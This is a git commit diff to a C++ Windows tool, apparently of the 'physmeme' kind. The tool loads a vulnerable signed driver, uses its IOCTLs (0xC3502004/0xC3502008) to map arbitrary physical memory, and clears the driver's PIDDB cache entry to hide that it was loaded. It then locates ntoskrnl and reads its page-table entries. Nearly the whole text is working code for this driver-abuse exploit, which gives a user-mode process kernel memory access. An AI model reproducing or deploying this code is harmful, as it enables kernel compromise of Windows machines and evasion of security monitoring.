removed junk code

merge-requests/1/merge
xerox 4 years ago
parent 5941251f67
commit 95be5d6e6e

@ -4,22 +4,40 @@
int __cdecl main(int argc, char** argv) int __cdecl main(int argc, char** argv)
{ {
nasa::load_drv(); if (!nasa::load_drv())
{
std::printf("[!] unable to load vulnerable driver... run as admin?\n");
return -1;
}
nasa::kernel_ctx kernel; nasa::kernel_ctx kernel;
std::printf("[+] %s mapped physical page -> 0x%p\n", nasa::syscall_hook.first.data(), nasa::psyscall_func.load());
std::printf("[+] %s page offset -> 0x%x\n", nasa::syscall_hook.first.data(), nasa::nt_page_offset);
// clear piddb cache table entry for vulnerable driver...
if (kernel.clear_piddb_cache(nasa::drv_key, util::get_file_header((void*)raw_driver)->TimeDateStamp)) if (kernel.clear_piddb_cache(nasa::drv_key, util::get_file_header((void*)raw_driver)->TimeDateStamp))
std::cout << "[+] Removed PIDDB Cache entry for physmeme driver..." << std::endl; std::printf("[+] Removed PIDDB Cache entry for physmeme driver...\n");
nasa::unload_drv(); else
std::printf("[!] unable to clear PIDDB Cache entry for vulnerable driver...\n");
if (!nasa::unload_drv())
{
std::printf("[!] unable to unload vulnerable driver... close all handles?\n");
return -1;
}
const std::pair<unsigned, virt_addr_t> my_proc_data = { GetCurrentProcessId(),
virt_addr_t{ reinterpret_cast<void*>(util::get_kernel_module_base("ntoskrnl.exe")) } };
const std::pair<unsigned, virt_addr_t> my_proc_data = { GetCurrentProcessId(), virt_addr_t{ GetModuleHandle(NULL) } };
std::cout << "[+] my pid: " << std::hex << my_proc_data.first << std::endl; std::cout << "[+] my pid: " << std::hex << my_proc_data.first << std::endl;
std::cout << "[+] my base: " << std::showbase << std::hex << my_proc_data.second.value << std::endl; std::cout << "[+] kernel base: " << std::showbase << std::hex << my_proc_data.second.value << std::endl;
nasa::mem_ctx my_proc(kernel, my_proc_data.first); nasa::mem_ctx my_proc(kernel, my_proc_data.first);
const auto module_base = my_proc_data.second; const auto ntoskrnl_pde = my_proc.get_pde(my_proc_data.second.value);
std::cout << "[+] base address pml4e: " << std::hex << my_proc[module_base.pml4_index].value << std::endl; // ntoskrnl is allocated in 2mb large pages :)
std::cout << "[+] base address pdpte: " << std::hex << my_proc[{module_base.pml4_index, module_base.pdpt_index}].value << std::endl; std::printf("[+] page present -> %d\n", ntoskrnl_pde.second.present);
std::cout << "[+] base address pde: " << std::hex << my_proc[{module_base.pml4_index, module_base.pdpt_index, module_base.pd_index}].value << std::endl; std::printf("[+] page frame number -> 0x%x\n", ntoskrnl_pde.second.pfn);
std::cout << "[+] base address pte: " << std::hex << my_proc[{module_base.pml4_index, module_base.pdpt_index, module_base.pd_index, module_base.pt_index}].value << std::endl; std::printf("[+] large page -> %d\n", ntoskrnl_pde.second.page_size);
std::cin.get(); std::cin.get();
} }

@ -214,7 +214,7 @@ namespace nasa
return {}; return {};
pt_entries entries; pt_entries entries;
if (use_hyperspace ? hyperspace_entries(entries, addr) : (bool)virt_to_phys(entries, addr)) if ((use_hyperspace ? hyperspace_entries(entries, addr) : virt_to_phys(entries, addr)))
return { entries.pt.first, entries.pt.second }; return { entries.pt.first, entries.pt.second };
return {}; return {};
} }
@ -236,7 +236,7 @@ namespace nasa
return {}; return {};
pt_entries entries; pt_entries entries;
if (use_hyperspace ? hyperspace_entries(entries, addr) : (bool)virt_to_phys(entries, addr)) if ((use_hyperspace ? hyperspace_entries(entries, addr) : virt_to_phys(entries, addr)))
return { entries.pd.first, entries.pd.second }; return { entries.pd.first, entries.pd.second };
return {}; return {};
} }
@ -258,7 +258,7 @@ namespace nasa
return {}; return {};
pt_entries entries; pt_entries entries;
if (use_hyperspace ? hyperspace_entries(entries, addr) : (bool)virt_to_phys(entries, addr)) if ((use_hyperspace ? hyperspace_entries(entries, addr) : virt_to_phys(entries, addr)))
return { entries.pdpt.first, entries.pdpt.second }; return { entries.pdpt.first, entries.pdpt.second };
return {}; return {};
} }
@ -280,7 +280,7 @@ namespace nasa
return {}; return {};
pt_entries entries; pt_entries entries;
if (use_hyperspace ? hyperspace_entries(entries, addr) : (bool)virt_to_phys(entries, addr)) if ((use_hyperspace ? hyperspace_entries(entries, addr) : virt_to_phys(entries, addr)))
return { entries.pml4.first, entries.pml4.second }; return { entries.pml4.first, entries.pml4.second };
return {}; return {};
} }

@ -8,6 +8,9 @@
#include "../loadup.hpp" #include "../loadup.hpp"
#include "../raw_driver.hpp" #include "../raw_driver.hpp"
#define MAP_PHYSICAL_MEMORY 0xC3502004
#define UNMAP_PHYSICAL_MEMORY 0xC3502008
#pragma pack ( push, 1 ) #pragma pack ( push, 1 )
typedef struct _GIOMAP typedef struct _GIOMAP
{ {
@ -23,7 +26,6 @@ namespace nasa
{ {
inline std::string drv_key; inline std::string drv_key;
inline HANDLE drv_handle = NULL; inline HANDLE drv_handle = NULL;
inline std::vector<std::pair<std::uintptr_t, std::uint32_t >> virtual_mappings;
inline bool load_drv() inline bool load_drv()
{ {
@ -51,38 +53,43 @@ namespace nasa
return CloseHandle(drv_handle) && driver::unload(drv_key); return CloseHandle(drv_handle) && driver::unload(drv_key);
} }
inline std::uintptr_t map_phys( inline std::uintptr_t map_phys(std::uintptr_t addr, std::size_t size)
std::uintptr_t addr,
std::size_t size
)
{ {
GIOMAP in_buffer = { 0, 0, addr, 0, size }; GIOMAP in_buffer = { 0, 0, addr, 0, size };
uintptr_t out_buffer[2] = { 0 }; uintptr_t out_buffer[2] = { 0 };
unsigned long returned = 0; unsigned long returned = 0;
DeviceIoControl(drv_handle, 0xC3502004, reinterpret_cast<LPVOID>(&in_buffer), sizeof(in_buffer),
reinterpret_cast<LPVOID>(out_buffer), sizeof(out_buffer), &returned, NULL);
virtual_mappings.push_back({ out_buffer[0], size }); if (!DeviceIoControl(
drv_handle,
MAP_PHYSICAL_MEMORY,
reinterpret_cast<LPVOID>(&in_buffer),
sizeof(in_buffer),
reinterpret_cast<LPVOID>(out_buffer),
sizeof(out_buffer),
&returned, NULL
))
return NULL;
return out_buffer[0]; return out_buffer[0];
} }
inline bool unmap_phys( inline bool unmap_phys(std::uintptr_t addr, std::size_t size)
std::uintptr_t addr,
std::size_t size
)
{ {
uintptr_t in_buffer = addr; uintptr_t in_buffer = addr;
uintptr_t out_buffer[2] = { sizeof(out_buffer) }; uintptr_t out_buffer[2] = { sizeof(out_buffer) };
unsigned long returned = NULL; unsigned long returned = NULL;
DeviceIoControl(drv_handle, 0xC3502008, reinterpret_cast<LPVOID>(&in_buffer), sizeof(in_buffer),
reinterpret_cast<LPVOID>(out_buffer), sizeof(out_buffer), &returned, NULL);
return out_buffer[0];
}
inline void unmap_all() if (!DeviceIoControl(
{ drv_handle,
for (auto idx = 0u; idx < virtual_mappings.size(); ++idx) UNMAP_PHYSICAL_MEMORY,
unmap_phys(virtual_mappings[idx].first, virtual_mappings[idx].second); reinterpret_cast<LPVOID>(&in_buffer),
sizeof(in_buffer),
reinterpret_cast<LPVOID>(out_buffer),
sizeof(out_buffer),
&returned, NULL
))
return false;
return out_buffer[0];
} }
} }
Loading…
Cancel
Save